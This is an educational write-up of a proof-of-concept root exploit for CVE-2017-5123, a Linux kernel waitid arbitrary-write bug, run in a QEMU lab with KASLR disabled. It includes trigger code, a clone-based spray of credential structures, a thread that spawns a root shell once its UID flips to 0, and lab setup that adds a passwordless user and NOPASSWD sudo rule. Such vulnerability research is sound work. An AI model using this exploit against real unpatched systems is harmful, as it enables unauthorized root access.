PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR
In this short writeup, I will analyze a kernel vulnerability that allows us to obtain root privileges.
I want to point out that there are many better ways to exploit this CVE (this is just a PoC for learning about the kernel and it can't be used in the wild), but I think that this methodology can be useful as an introduction to kernel exploitation.
This vulnerability was introduced in commit 4c48abe91be0, so we need to build that version of the kernel.
This can be a little tricky because it is an old version and the code needs some patching.
I made a repository with already patched kernel code and a .config file, so you can just clone and build.
git clone https://github.com/c3r34lk1ll3r/kernel_mirror.git
cd kernel_mirror
git checkout origin/modified_v4.14
wget https://gist.githubusercontent.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8/raw/52431b577a71e3fe8f89d6ce355ce9c1c54c53b6/.config
make -j 8 --output-sync=recurse
Note that this kernel will be built with virtio drivers, so you can use a virtio disk to share files between the host and the VM.
Now, we will create the initial rootfs:
qemu-img create -f raw hda.raw 10G
# Format the disk to ext4
mkfs.ext4 ./hda.raw
# Make a mountpoint for the image
mkdir /tmp/mount1
# Mount the disk
sudo mount -o loop ./hda.raw /tmp/mount1
Then, we should install a basic Linux distribution, for example using pacstrap or debootstrap.
sudo pacstrap /tmp/mount1 base base-devel vim
Finally, we can modify the system:
# Add a 'test' user
echo 'test:x:1000:1000::/home/test:/bin/bash' | sudo tee -a /tmp/mount1/etc/passwd
# without password
echo 'test::14871::::::' | sudo tee -a /tmp/mount1/etc/shadow
# we can mount a virtio disk in order to share files between host and guest
echo '/transient /home/test/shared 9p trans=virtio,version=9p2000.L,rw,user,exec 0 0' | sudo tee -a /tmp/mount1/etc/fstab
sudo mkdir -p /tmp/mount1/home/test/shared
# It is useful to have sudo permission
echo '%wheel ALL=(ALL) NOPASSWD: ALL' | sudo tee -a /tmp/mount1/etc/sudoers
echo 'wheel:x:998:test' | sudo tee -a /tmp/mount1/etc/group
sudo chown -R 1000:1000 /tmp/mount1/home/test
sudo umount /tmp/mount1
If everything is in order, we can now boot our test system with QEMU:
qemu-system-x86_64 \
-kernel ./kernel_mirror/arch/x86_64/boot/bzImage \
-hda ./hda.raw \
-m 4G \
-cpu "Skylake-Client-IBRS,ss=on,vmx=on,hypervisor=on,tsc-adjust=on,clflushopt=on,umip=on,md-clear=on,stibp=on,arch-capabilities=on,ssbd=on,xsaves=on,pdpe1gb=on,ibpb=on,amd-ssbd=on,skip-l1dfl-vmentry=on,hle=off,rtm=off" \
-smp 4 \
-vga virtio \
-enable-kvm \
-nographic \
-machine type=q35,accel=kvm \
-virtfs "fsdriver=local,id=fs.1,path=./trans_fs,security_model=mapped,writeout=immediate,mount_tag=/transient" \
-append "root=/dev/sda rw noquiet nokaslr console=ttyS0 loglevel=5" \
-chardev "vc,id=vc.0,cols=1920,rows=1080" \
-net "user,hostfwd=tcp::10022-:22" \
-net "nic" \
-s
The description of the CVE says that there is an unrestricted write operation during the waitid system call.
Let's open kernel/exit.c and look at the code:
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
This function is pretty straightforward: after a few checks, there are several calls to unsafe_put_user(...) and the function returns.
Most of the function consists of unsafe_put_user(...) calls, so let's move there (arch/x86/include/asm/uaccess.h):
/*
* The "unsafe" user accesses aren't really "unsafe", but the naming
* is a big fat warning: you have to not only do the access_ok()
* checking before using them, but you have to surround them with the
* user_access_begin/end() pair.
*/
#define user_access_begin() __uaccess_begin()
#define user_access_end() __uaccess_end()
#define unsafe_put_user(x, ptr, err_label) \
do { \
int __pu_err; \
__typeof__(*(ptr)) __pu_val = (x); \
__put_user_size(__pu_val, (ptr), sizeof(*(ptr)), __pu_err, -EFAULT); \
if (unlikely(__pu_err)) goto err_label; \
} while (0)
#define unsafe_get_user(x, ptr, err_label) \
do { \
int __gu_err; \
__inttype(*(ptr)) __gu_val; \
__get_user_size(__gu_val, (ptr), sizeof(*(ptr)), __gu_err, -EFAULT); \
(x) = (__force __typeof__(*(ptr)))__gu_val; \
if (unlikely(__gu_err)) goto err_label; \
} while (0)
There is a big fat warning in the comment: if you want to use unsafe_put/get_user you should first call access_ok() and surround them with user_access_begin/end().
If we take a look at the previous code (waitid) we can see that access_ok() is never called, so the system call violates this warning.
But what are those macros?
SMAP and SMEP are two security features supported by the kernel in order to make exploits harder to write. Note that these features are enforced by the CPU.
SMEP prevents the CPU from executing userspace code while it is in supervisor mode; SMAP, instead, blocks supervisor-mode read/write access to user memory.
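Since both features are CPU features, it can be handy to confirm that the (virtual) CPU of the test machine actually advertises them. The sketch below queries CPUID leaf 7, subleaf 0, where EBX bit 7 reports SMEP and EBX bit 20 reports SMAP. The function names reg_has_bit and cpu_smep_smap are made up for this example, and the result only tells us what the CPU supports, not whether the running kernel has enabled the corresponding CR4 bits.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#endif

/* Bit positions in CPUID.(EAX=7,ECX=0):EBX. */
#define CPUID7_EBX_SMEP_BIT 7
#define CPUID7_EBX_SMAP_BIT 20

/* Pure helper (hypothetical name): is bit `bit` set in `reg`? */
bool reg_has_bit(uint32_t reg, unsigned bit)
{
    assert(bit < 32);
    return (reg >> bit) & 1u;
}

/*
 * Hypothetical helper: reads CPUID leaf 7 / subleaf 0 and fills in the
 * two flags. Returns 0 on success, -1 if the leaf is not available or
 * the code was not built for x86.
 */
int cpu_smep_smap(bool *smep, bool *smap)
{
#if defined(__x86_64__) || defined(__i386__)
    unsigned int eax, ebx, ecx, edx;

    if (!__get_cpuid_count(7, 0, &eax, &ebx, &ecx, &edx))
        return -1;
    *smep = reg_has_bit(ebx, CPUID7_EBX_SMEP_BIT);
    *smap = reg_has_bit(ebx, CPUID7_EBX_SMAP_BIT);
    return 0;
#else
    (void)smep;
    (void)smap;
    return -1;
#endif
}
```

Inside the guest, the smep and smap entries in the flags line of /proc/cpuinfo should give the same information without writing any code.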
The kernel still needs to read and write user memory, and this can be accomplished in two ways:
- use functions (e.g. copy_from_user) that copy the memory into kernel space;
- temporarily disable SMAP.
As we can see in the definition of unsafe_put_user, this macro only copies the value of x to the memory pointed to by ptr (and jumps to err_label if there was an error). We have just said that the kernel can't access userspace because of SMAP, and this is why those macros should be wrapped between user_access_begin/end().
#define __uaccess_begin() stac()
#define __uaccess_end() clac()
As we can see, user_access_begin/end are simply the ASM instructions stac and clac.
- stac: "Sets the AC flag bit in EFLAGS register. This may enable alignment checking of user-mode data accesses. This allows explicit supervisor-mode data accesses to user-mode pages even if the SMAP bit is set in the CR4 register."
- clac: "Clears the AC flag bit in EFLAGS register. This disables any alignment checking of user-mode data accesses. If the SMAP bit is set in the CR4 register, this disallows explicit supervisor-mode data accesses to user-mode pages."
Basically, these two macros enable/disable SMAP.
Our previous "warning" also mentions the access_ok function:
/**
* access_ok: - Checks if a user space pointer is valid
* @type: Type of access: %VERIFY_READ or %VERIFY_WRITE. Note that
* %VERIFY_WRITE is a superset of %VERIFY_READ - if it is safe
* to write to a block, it is always safe to read from it.
* @addr: User space pointer to start of block to check
* @size: Size of block to check
*
* Context: User context only. This function may sleep if pagefaults are
* enabled.
*
* Checks if a pointer to a block of memory in user space is valid.
*
* Returns true (nonzero) if the memory block may be valid, false (zero)
* if it is definitely invalid.
*
* Note that, depending on architecture, this function probably just
* checks that the pointer is in the user space range - after calling
* this function, memory access functions may still return -EFAULT.
*/
#define access_ok(type, addr, size) \
({ \
WARN_ON_IN_IRQ(); \
likely(!__range_not_ok(addr, size, user_addr_max())); \
})
The comment here is self-explanatory: this macro checks whether the pointer is a valid user space pointer, that is, whether the whole block lies within the user space address range.
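To make the check concrete, here is a minimal user-space model of the range test behind access_ok(). It is a sketch, not the kernel code: the name model_access_ok is invented, and the limit assumes x86_64 with 4-level paging, where the highest user address is 2^47 minus one page.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumption: x86_64, 4-level paging, so the limit is 2^47 - PAGE_SIZE. */
#define MODEL_USER_ADDR_MAX 0x00007ffffffff000ULL

/*
 * Hypothetical model of access_ok(): returns true when the block
 * [addr, addr + size) does not wrap around and ends at or below the
 * user space limit.
 */
bool model_access_ok(uint64_t addr, uint64_t size)
{
    uint64_t end = addr + size;

    if (end < addr)             /* addr + size overflowed */
        return false;
    return end <= MODEL_USER_ADDR_MAX;
}
```

With this model, a typical user pointer such as 0x00007ffff7dd0000 passes, while a kernel pointer such as 0xffff880000000000 is rejected. That rejection is exactly what waitid skips.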
Let's take another look at the waitid code:
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
As you have already guessed, the absence of access_ok() leads to an arbitrary write anywhere in memory, kernel space included, because the infop pointer is completely controlled by the attacker.
It's really easy to reach the vulnerable path, and we can create a trigger with this simple code:
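#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/wait.h>

// Set by the child so the parent knows that it has started
volatile int thread_ready;
int die_thread(void *arg){
    thread_ready=1;
    syscall(__NR_sched_yield);
    return 0;
}
// Top of the child's stack: it must be allocated before calling trigger_bug
void *stack;
int trigger_bug(uint64_t where, int what){
    printf("[0] Trying to overwrite 0x%016lx\r", (unsigned long)where);
    //int pid = fork(); // It is also possible to use fork syscall
    thread_ready = 0;
    int pid = clone(die_thread, stack, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
    int err;
    while(thread_ready == 0) {syscall(__NR_sched_yield);} // We should wait for the thread
    // The kernel writes the siginfo fields at 'where' without any check
    err = syscall(__NR_waitid, P_PID, pid, where, WEXITED, NULL);
    return err;
}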
This simple code triggers the vulnerability and writes to the memory pointed to by the where address.
We can use gdb if we want to check this trigger. For example, we can select an arbitrary address and use the trigger_bug function to overwrite it.
This vulnerability can be exploited in various ways, but I prefer a very simple approach.
Remember that we can write anywhere we want, but the written data is only partially controlled. In particular, we can overwrite an address with 0.
The basic idea is to overwrite the UID of our process and become root, but we first need to understand what credentials are in Linux.
We start by digging into the fork system call, which is used to create new processes.
We can check the code in kernel/fork.c:
SYSCALL_DEFINE0(fork)
{
return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}
So, the fork system call is simply a wrapper for _do_fork with hardcoded parameters.
This last function is a bit long but we can summarize it in this way:
long _do_fork(unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *parent_tidptr,
int __user *child_tidptr,
unsigned long tls)
{
struct task_struct *p;
int trace = 0;
long nr;
......
// This will create another task struct but it will NOT start the process.
p = copy_process(clone_flags, stack_start, stack_size,
child_tidptr, NULL, trace, tls, NUMA_NO_NODE);
add_latent_entropy();
......
// Wake up the new created task. This will set in RUNNING the state of the task and enqueue in the running queue code
wake_up_new_task(p);
......
put_pid(pid);
} else {
nr = PTR_ERR(p);
}
return nr;
}
This function allocates a new task_struct object. Although this structure is really important (it describes a process), we will focus our attention on the cred field:
...
/* Process credentials: */
/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
As we can see, there are three pointers to struct cred. Let's see how this structure is composed (include/linux/cred.h):
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
......
As we can see, the UID of a process is simply an unsigned integer (follow the definition of kuid_t), so we can simply overwrite this value with 0 in order to become root.
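To see where the IDs sit inside the object, we can mirror the first fields of struct cred in user space and ask the compiler for the offsets. This is only a sketch: every model_ name is invented for this example, and the layout assumes CONFIG_DEBUG_CREDENTIALS is disabled, so usage is immediately followed by uid.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical user-space stand-ins for atomic_t, kuid_t and kgid_t. */
typedef struct { int counter; } model_atomic_t;
typedef struct { uint32_t val; } model_kuid_t;
typedef struct { uint32_t val; } model_kgid_t;

/* Mirror of the head of struct cred (no CONFIG_DEBUG_CREDENTIALS). */
struct model_cred_head {
    model_atomic_t usage;
    model_kuid_t uid;    /* real UID */
    model_kgid_t gid;    /* real GID */
    model_kuid_t suid;   /* saved UID */
    model_kgid_t sgid;   /* saved GID */
    model_kuid_t euid;   /* effective UID */
    model_kgid_t egid;   /* effective GID */
    model_kuid_t fsuid;  /* UID for VFS ops */
    model_kgid_t fsgid;  /* GID for VFS ops */
};

/* Simplified check: nonzero when both the real and effective UID are 0. */
int model_is_root(const struct model_cred_head *c)
{
    assert(c != NULL);
    return c->uid.val == 0 && c->euid.val == 0;
}
```

Under these assumptions the eight IDs are packed one after another, 4 bytes each, starting at offset 4. The real UID at offset 4 is the field that getuid reports.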
The task_struct structure is allocated in the copy_process function, which is a bit complex; its main goal is to "copy" the process into a new one.
We can focus on copy_creds(p, clone_flags), which is defined as:
/*
* Copy credentials for the new process created by fork()
*
* We share if we can, but under some circumstances we have to generate a new
* set.
*
* The new process gets the current process's subjective credentials as its
* objective and subjective credentials
*/
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
if (
#ifdef CONFIG_KEYS
!p->cred->thread_keyring &&
#endif
clone_flags & CLONE_THREAD
) {
p->real_cred = get_cred(p->cred);
get_cred(p->cred);
alter_cred_subscribers(p->cred, 2);
kdebug("share_creds(%p{%d,%d})",
p->cred, atomic_read(&p->cred->usage),
read_cred_subscribers(p->cred));
atomic_inc(&p->cred->user->processes);
return 0;
}
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
.........
error_put:
put_cred(new);
return ret;
}
As we can see, this function calls prepare_creds, where the real allocation is performed.
We now have a path to allocate a (pseudo)arbitrary number of struct cred objects:
_do_fork()
copy_process()
copy_creds()
Our last problem is how to call _do_fork() from userspace. We can use fork, but this can be slow, so we will use clone instead.
Note: we can't use pthread because of the flags it passes: if you look at the code of copy_creds you should notice that there is a path (taken when CLONE_THREAD is set) where the structure is not really allocated and the existing credentials are shared instead.
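The first branch of copy_creds can be modelled as a small predicate on the clone flags. In the sketch below the M_CLONE_ constants copy the values from the kernel's uapi header under a prefix (to avoid clashing with sched.h), model_creds_shared is an invented name, and PTHREAD_LIKE_FLAGS is only an approximation of what a threading library passes.

```c
#include <assert.h>
#include <stdbool.h>

/* Values as in include/uapi/linux/sched.h, prefixed for this model. */
#define M_CLONE_VM      0x00000100UL
#define M_CLONE_FS      0x00000200UL
#define M_CLONE_FILES   0x00000400UL
#define M_CLONE_SIGHAND 0x00000800UL
#define M_CLONE_THREAD  0x00010000UL
#define M_CLONE_SYSVSEM 0x00040000UL

/* Flags used by the clone() calls in this writeup (exit signal omitted). */
#define SPRAY_FLAGS \
    (M_CLONE_VM | M_CLONE_FS | M_CLONE_FILES | M_CLONE_SYSVSEM)

/* Approximation of the flags a pthread-style thread is created with. */
#define PTHREAD_LIKE_FLAGS \
    (SPRAY_FLAGS | M_CLONE_SIGHAND | M_CLONE_THREAD)

/*
 * Hypothetical model of the first branch of copy_creds(): returns true
 * when the new task would share the existing struct cred instead of
 * getting a fresh one from prepare_creds().
 */
bool model_creds_shared(unsigned long clone_flags, bool has_thread_keyring)
{
    return !has_thread_keyring && (clone_flags & M_CLONE_THREAD) != 0;
}
```

With the spray flags the predicate is false, so every clone() call allocates a new struct cred, which is what the spray needs.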
Now, a little recap:
- we are able to trigger the bug and write to memory;
- we know that we can write 0 to memory;
- we know that if we overwrite the UID of one process with 0, it obtains root permissions.
Now we need to know where to write in memory. Although KASLR is disabled, the address of a single struct cred is not stable enough, so I decided to proceed with memory spraying.
We need to find the struct cred in memory in order to determine a range of addresses. We can use gdb and python with a script like this:
....
for task in task_lists():
    #gdb.write("{address} {pid} {comm}\n".format(
    #    address=task,
    #    pid=task["pid"],
    #    comm=task["comm"].string()))
    comm = task["comm"].string()
    # Insert your executable name
    if comm == "exploit":
        # Address of the struct cred of this task
        print(task['cred'])
....
Note: this script works only with KASLR disabled and with debug symbols (we need the init_task pointer).
After a few runs we can see that the heap grows downward, so we can start from a lower address and scan upward.
Now we can use the clone system call to spawn a lot of processes and, thanks to gdb, we can check the addresses:
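// Stack for the short-lived thread used by trigger_bug (stacks grow down, so we keep the top)
stack = malloc(STACK_SIZE);
if (!stack){
    perror("[-] Malloc");
    return -1;
}
stack = (char *)stack + STACK_SIZE;
for(x=0;x<MAX_THREADS;x++){
    // Check the allocation before computing the top of the stack
    stackTop = malloc(STACK_SIZE);
    if (!stackTop){
        perror("[-] Malloc");
        return -1;
    }
    stackTop = (char *)stackTop + STACK_SIZE;
    // spray_thread function can simply be an infinite loop
    pid = clone(spray_thread, stackTop, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
    if (pid == -1){
        perror("\n\nCLONE");
        return -1;
    }
    printf("[0] Process created: %d\r", x);
}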
Note: you may not be able to spawn more than about 4k processes. Check ulimit if this is the case.
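The limit can also be checked from the program itself before spraying. The sketch below reads RLIMIT_NPROC with getrlimit and compares the soft limit with the number of processes we plan to create; nproc_limits and limit_allows are names invented for this example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <sys/resource.h>

/*
 * Hypothetical helper: reads the soft and hard RLIMIT_NPROC values.
 * Returns 0 on success and -1 if getrlimit() fails.
 */
int nproc_limits(rlim_t *soft, rlim_t *hard)
{
    struct rlimit rl;

    assert(soft != NULL && hard != NULL);
    if (getrlimit(RLIMIT_NPROC, &rl) != 0)
        return -1;
    *soft = rl.rlim_cur;
    *hard = rl.rlim_max;
    return 0;
}

/* True when a soft limit of `soft` leaves room for `wanted` processes. */
bool limit_allows(rlim_t soft, unsigned long wanted)
{
    return soft == RLIM_INFINITY || (rlim_t)wanted <= soft;
}
```

A caller could run nproc_limits() once at startup and lower MAX_THREADS (or raise the limit) when limit_allows() returns false. Note that the limit counts every process owned by the user, not only the sprayed ones.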
Finally, we can write our PoC.
It is sufficient to call trigger_bug with different addresses (searching for the structure) while our spawned threads check their UID, like this:
struct shared_area{
int one_win;
};
struct shared_area glob_var;
// Sprayed thread
int spray_thread(void *arg){
int uid;
int previous_one = syscall(__NR_getuid);
// Loop over syscall getUID
while(1){
uid = syscall(__NR_getuid);
//printf("UID: %d\n",uid);
// If the returned UID differs from the previous one, we have hit a struct cred
if (uid != previous_one){
printf("WIN!! with %d", uid);
// Tell the other threads to exit in order to stabilize the system
glob_var.one_win = 1;
// Simply spawn a shell
system("/bin/sh");
}
if(glob_var.one_win == 1)
return 1;
}
return 0;
}
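The search over addresses can be sketched as a loop that walks a range with a fixed stride and stops as soon as one thread reports success. In this sketch the write and the stop condition are passed as callbacks, so the loop can be tried safely with mocks; in the PoC the write callback would wrap trigger_bug and the stop callback would read glob_var.one_win. The range, the stride and every name below are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef int (*write_fn)(uint64_t where, void *ctx); /* performs one write */
typedef int (*done_fn)(void *ctx);                  /* nonzero: stop */

/*
 * Hypothetical scanner: calls do_write() on start, start + stride, ...
 * while the address is below `end` and done() returns 0.
 * Returns the number of writes attempted.
 */
size_t scan_range(uint64_t start, uint64_t end, uint64_t stride,
                  write_fn do_write, done_fn done, void *ctx)
{
    size_t attempts = 0;

    assert(stride != 0 && do_write != NULL && done != NULL);
    for (uint64_t addr = start; addr < end; addr += stride) {
        if (done(ctx))
            break;
        do_write(addr, ctx);
        attempts++;
        if (addr > UINT64_MAX - stride)  /* next step would wrap */
            break;
    }
    return attempts;
}

/* Mock callbacks: count the writes and "win" after stop_after of them. */
struct mock_ctx {
    size_t writes;
    size_t stop_after;
    uint64_t last;
};

int mock_write(uint64_t where, void *ctx)
{
    struct mock_ctx *m = ctx;

    m->writes++;
    m->last = where;
    return 0;
}

int mock_done(void *ctx)
{
    const struct mock_ctx *m = ctx;

    return m->writes >= m->stop_after;
}
```

Keeping the loop separate from the write makes it easy to experiment with different ranges and strides without touching kernel memory.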
There is about a 50% chance of hitting the structure, so after a few runs you can obtain root privileges.
This is a (basic) PoC and the spraying is far from perfect. This is just an "introduction" to the amazing world of the kernel; there are a lot of concepts that I skipped, but they are extremely important (like memory management). If you want to study deeper you can take a look at prepare_creds and the memory allocations.
KASLR is disabled here, although this vulnerability allows bypassing that mitigation as well (unsafe_put_user doesn't crash on an invalid address). I don't think that adding a new "layer" of bruteforcing is useful if your goal is to learn about the kernel. If your objective is to use this vulnerability in the wild you should write a different exploit (at least, with different spraying).
Food for thought: I used this vulnerability to understand and try the ret2dir technique (Hint: you can trigger the write at the alias address and read the modification through the userspace address).
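As a starting point for that experiment, the alias of a user page in the kernel's direct mapping can be computed from its page frame number. The sketch below assumes x86_64 with 4-level paging, no KASLR and the 4.14 memory layout, where the direct mapping starts at 0xffff880000000000; it also decodes a /proc/self/pagemap entry (bit 63 is the present bit, bits 0-54 hold the PFN). The function names are invented, and the pagemap file only reveals real PFNs to privileged readers.

```c
#include <assert.h>
#include <stdint.h>

/* Assumptions: x86_64, 4-level paging, nokaslr, v4.14 memory layout. */
#define MODEL_PAGE_OFFSET 0xffff880000000000ULL
#define MODEL_PAGE_SHIFT  12

/*
 * Hypothetical helper: kernel direct-map alias of the byte at offset
 * `page_off` inside the physical page with frame number `pfn`.
 */
uint64_t physmap_alias(uint64_t pfn, uint64_t page_off)
{
    assert(page_off < (1ULL << MODEL_PAGE_SHIFT));
    return MODEL_PAGE_OFFSET + (pfn << MODEL_PAGE_SHIFT) + page_off;
}

/*
 * Decodes one 64-bit /proc/self/pagemap entry.
 * Returns 0 and stores the PFN if the page is present, -1 otherwise.
 */
int pagemap_entry_pfn(uint64_t entry, uint64_t *pfn)
{
    assert(pfn != 0);
    if (!(entry >> 63))
        return -1;
    *pfn = entry & ((1ULL << 55) - 1);
    return 0;
}
```

A write triggered at physmap_alias(pfn, off) should then become visible through the user mapping of the same page, which is the effect the hint describes.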